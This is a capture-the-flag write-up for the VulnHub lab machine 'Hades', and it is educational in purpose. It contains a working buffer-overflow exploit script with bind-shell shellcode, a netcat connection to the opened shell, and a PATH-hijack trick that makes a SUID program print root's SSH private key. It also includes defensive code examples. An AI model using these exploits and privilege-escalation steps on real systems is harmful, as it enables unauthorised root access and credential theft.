Hades Writeup

Hello.

What an awesome challenge.

Thanks Lok_Sigma.

I started this one a bit late, but here I am!

Information Gathering

[screenshot: port_scan]

Grabbing banners

telnet 192.168.58.127 22
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1

No luck here of course!

SSHing Hades

ssh [email protected]

returned me a welcome banner:

f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAABUDgAAAAAAADQAIAAIACgAHwAcAAYAAAA0AAAANIAECDSABAgAAQAAAAEAAAUAAAAEAAAAAwAAADQBAAA0gQQINIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIxAsAAMQLAAAFAAAAABAAAAEAAADECwAAxJsECMSbBAhQAQAAVAAAAYAAAAAEAAAAgAAANALAADQmwQI0JsECPAAAADwAAAABgAAAAQAAAAEAAAASAEAAEiBBAhIgQQIRAAAAEQAAAAEAAAABAAAAFDldGTUCgAA1IoECNSKBAg0AAAANAAAAAQAAAAEAAAAUeV0ZAAAAAAAAAAAAAAAAAAAAAAAAAAABw ...[content wrapped]

At first I thought I could split the banner somehow and that it was an SSH key I could log in with. But ehh.. NO!

Exploiting

Transferring the encoded binary to Kali Linux

scp base [email protected][kaliip]:/root/Desktop/base

Base64 Decode

cat base.enc | base64 -d | tee base.bin

After decoding I saw an "ELF" string at the start of the file, which means it's an executable.

[email protected]# file base.bin
base.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, not stripped
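As an added example (mine, not part of the original writeup), the same triage can be done without touching the disk: base64-decode the first 80 characters of the banner quoted above and parse the ELF32 header directly. It recovers what `file` reported (32-bit, little-endian, Intel 80386, executable) plus the entry point and the program/section header counts. The banner prefix is copied from the banner above; the machine-name table is a small subset I added.

```python
import base64
import struct

# First 80 base64 characters of the SSH banner quoted above (60 decoded
# bytes, enough to cover the 52-byte ELF32 header).
BANNER_PREFIX = ("f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAABU"
                 "DgAAAAAAADQAIAAIACgAHwAcAAYAAAA0AAAA")

ELF_MAGIC = b"\x7fELF"
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINE = {3: "Intel 80386", 40: "ARM", 62: "x86-64", 183: "AArch64"}  # subset


def parse_elf32_header(blob):
    """Parse a 52-byte ELF32 header. Returns a dict, or None if blob is not ELF32."""
    if len(blob) < 52 or blob[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = blob[4], blob[5]
    if ei_class != 1:                        # 1 = ELFCLASS32; ELF64 lays its header out differently
        return None
    endian = "<" if ei_data == 1 else ">"    # 1 = little-endian, 2 = big-endian
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    f = struct.unpack(endian + "HHIIIIIHHHHHH", blob[16:52])
    return {
        "class": 32,
        "little_endian": ei_data == 1,
        "type": E_TYPE.get(f[0], hex(f[0])),
        "machine": E_MACHINE.get(f[1], hex(f[1])),
        "entry": f[3],
        "phoff": f[4],
        "shoff": f[5],
        "phnum": f[9],
        "shnum": f[11],
    }


def identify_banner(b64_text):
    """Decode a base64 banner (whitespace and line wraps ignored) and inspect it as ELF."""
    raw = base64.b64decode("".join(b64_text.split()))
    return parse_elf32_header(raw)


if __name__ == "__main__":
    print("ELF header from banner:", identify_banner(BANNER_PREFIX))
```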

netstat -ntpl

[screenshot: netstat]

Hmm, port 65535 is open on my box. That seems to be the same executable that runs on the Hades box on the same port. So, if I manage to exploit it, I could get a shell on Hades.

base.bin runtime protections

[screenshot: checksec]

Here I see no protections compiled into the executable. BUT, by default newer systems have ASLR, which means the stack addresses are randomized!

[email protected]:/display_root_ssh_key# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 175  
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A  

Exploit Base

#!/usr/bin/python
import socket

port = int(raw_input('Enter port:'))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# the 175-byte cyclic pattern from pattern_create.rb shown above
buffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A")

try:
    print "\nSending evil h3ck..."
    s.connect(('localhost', port))
    data = s.recv(1024)
    s.send(buffer + '\r\n')
    print "\nDone!."
except:
    print "Could not connect"

From pattern_offset.rb I understood that:

[171 bytes garbage][EIP]

From this point on I enabled ASLR in gdb in order to work under real conditions.

(gdb) set disable-randomization off

We check $esp, where we stored our shellcode. Our shellcode starts at 0xbffff3c0, which is 0x1c (28) bytes past the value of $esp.

[screenshot: stack]

I need to find a gadget that will help me jump to the start of my shellcode. In other words, I want the top of the stack to be my shellcode.

objdump -d base.bin | grep 0x1c

[screenshot: add_esp]

I like that add $0x1c,%esp!

[screenshot: gadget]

 8048a32:    83 c4 1c                add    $0x1c,%esp
 8048a35:    5b                      pop    %ebx
 8048a36:    5e                      pop    %esi
 8048a37:    5f                      pop    %edi
 8048a38:    5d                      pop    %ebp
 8048a39:    c3                      ret  

Here we can see that our application crashes on the NOP instructions. I found it useful to put a jmp $esp address here, so that when it executes it redirects the application to the start of my shellcode.

[screenshot: need_of_jmpesp]

Payload

[17 * \x90][jmp $esp][shellcode (96 bytes)][54 * \x90][EIP (&gadget)]

Final exploit

#!/usr/bin/python
import socket

# nasm > jmp esp
# 00000000  FFE4              jmp esp

# gadget 
# 8048a32:    83 c4 1c                add    $0x1c,%esp
# 8048a35:    5b                      pop    %ebx
# 8048a36:    5e                      pop    %esi
# 8048a37:    5f                      pop    %edi
# 8048a38:    5d                      pop    %ebp
# 8048a39:    c3                      ret  

#buffer = "A" *171 + [EIP]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#http://shell-storm.org/shellcode/files/shellcode-217.php
shellcode=("\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+  
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"+  
"\x89\xc7\x52\x66\x68"+  
"\x7a\x69"+  
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"+  
"\xb0\x66\xb3\x04\xcd\x80"+  
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"+  
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"+  
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80")


jmp_esp = "\x97\x86\x04\x08"


buffer = "\x90"*17+ jmp_esp  + shellcode + "\x90"*54+ "\x32\x8a\x04\x08"

try:  
     print "\nSending evil h3ck..."
     s.connect(('192.168.58.128',65535))
     data = s.recv(1024)
     print data
     s.send(buffer)
     print "\nDone!."
except:  
     print "Could not connect" 

Connecting to bind tcp port 31337

The shellcode binds TCP port 31337 on Hades for us :)

nc 192.168.58.128 31337  

Let's have an interactive shell

python -c 'import pty; pty.spawn("/bin/bash");'

Gather gather gather

[email protected]:/home/loki$ cat notes  
AES 256 CBC  
Good for you and good for me.  
[email protected]:/display_root_ssh_key$ ls -la  
drwxr-xr-x  2 root root   4096 Mar 18 20:31 .  
drwxr-xr-x 23 root root   4096 Mar 19 17:27 ..  
-rw-------  1 root root      1 Mar 19 19:38 counter
-rwsr-sr-x  1 root root 273048 Mar 18 20:31 display_key
ls -la key_file  
-r--------  1 root root  9984 Mar 19 17:27 key_file

I want the id_rsa key :)

First I ran strings on display_key and got some cool stuff:

[screenshot: strings]

[screenshot: strings1]

display_key didn't run, so I created a "counter" file on my test machine. Then it asked me for a password:

[screenshot: display_key]

After 2-3 tries, it reboots the system.

I removed the program that reboots my virtual machine:

rm /sbin/reboot  

Be careful: I am on a testing machine (live DVD), that's why I removed the file.

(Another way would be to make the counter file immutable.)

[screenshot: not_found]

When I saw "reboot: not found", I wanted to see whether I could play with environment variables!

export PATH=/home/loki:${PATH}

echo "cat /root/.ssh/id_rsa" > /home/loki/reboot  
chmod +x /home/loki/reboot  

[screenshot: rsa_key]

(The counter file must be set to "2" for the exploit to run, because the "2" in the counter file is what triggers the execv("reboot").)
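The root cause here is that a SUID root program let the caller's PATH decide which "reboot" got executed. As an added example (mine, not code from the Hades binary), the two resolvers below contrast that lookup with one a privileged program should use: consult only fixed directories and refuse a candidate that is not root-owned or that others can write. The directory list and the constructed fake "reboot" are assumptions for the demo; in a C binary the same rule is execve() of an absolute path with a fixed environment.

```python
import os
import stat
import tempfile

# Fixed search path a privileged program should use instead of the caller's PATH
# (assumption: the directories that legitimately hold system binaries on this host).
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def naive_lookup(cmd, path_env):
    """What a PATH-searching exec (execvp/execlp, system()) does: first executable match wins."""
    for directory in path_env.split(":"):
        candidate = os.path.join(directory, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def trusted_lookup(cmd, dirs=TRUSTED_DIRS):
    """Resolve only inside fixed dirs; accept only a regular root-owned file nobody else can write."""
    for directory in dirs:
        candidate = os.path.join(directory, cmd)
        try:
            st = os.stat(candidate)
        except OSError:
            continue                      # not here, try the next trusted directory
        others_can_write = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if st.st_uid == 0 and not others_can_write and stat.S_ISREG(st.st_mode):
            return candidate
        return None                       # present but not trustworthy: fail closed
    return None


def demo():
    """Constructed scenario: a user-writable directory prepended to PATH holds a fake reboot."""
    with tempfile.TemporaryDirectory() as home:
        fake = os.path.join(home, "reboot")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho 'not the real reboot'\n")
        os.chmod(fake, 0o777)             # executable, user-owned, world-writable
        path_env = home + ":" + ":".join(TRUSTED_DIRS)
        picked_fake = naive_lookup("reboot", path_env) == fake
        refused_fake = trusted_lookup("reboot", dirs=(home,) + TRUSTED_DIRS) != fake
        return picked_fake, refused_fake


if __name__ == "__main__":
    hijackable, refused = demo()
    print("PATH lookup picks the fake:", hijackable, "| trusted lookup refuses it:", refused)
```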

W00t W00t

I logged in to Hades as root with the private RSA SSH key.

ssh -i hades_rsa [email protected][hades_ip]

I created a backup directory with the flag.txt.enc and /key_file just in case.

mkdir /root/backup  
cp /root/flag.txt.enc /root/backup  
cp /key_file /root/backup  
openssl enc -d -aes-256-cbc -in /root/flag.txt.enc -pass file:/key_file -out /root/flagg.txt
[email protected]:/# cat /root/flagg.txt  
Congratulations on completing Hades.

Feel free to ping me on #vulnhub and tell me what you thought.

The PGP key below can be used to encrypt solution submissions, and to prove you got through it all.

-Lok_Sigma


Bonus information for display_key

Nx Enabled

[screenshot: nx_enabled]

cat rsa_key address

[screenshot: cat]

EIP owned

[20 bytes garbage][EIP]

[screenshot: display_key_eip]

S3cr3t !?

There is a string hardcoded in the binary. Nothing much.

[screenshot: s3cr3t]


Scripts used:
http://www.trapkit.de/tools/checksec.sh
My attacking machine was Kali Linux 1.0.6 x86
Hades download url: http://vulnhub.com/entry/the-infernal-hades,61/
Please don't hesitate to ask me anything at [email protected]